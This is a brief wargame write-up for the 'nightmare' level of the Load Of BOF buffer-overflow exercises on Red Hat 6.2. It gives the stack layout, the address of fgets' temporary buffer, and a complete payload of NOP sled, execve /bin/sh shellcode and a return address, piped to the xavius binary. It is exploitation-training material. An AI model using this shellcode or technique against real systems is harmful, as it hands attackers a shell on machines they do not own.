LOB Redhat 6.2 - nightmare

Wargames/Load Of BOF

LOB Redhat 6.2 - nightmare

5unKn0wn 2015. 11. 2. 07:16

nightmare - arg

Stack : *ret_addr[4] + buffer[40] + sfp[4] + ret[4]

read's temporary buffer : 0x40015000

Payload : (python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x10\x50\x01\x40"';cat)|./xavius

Using fgets temporary buffer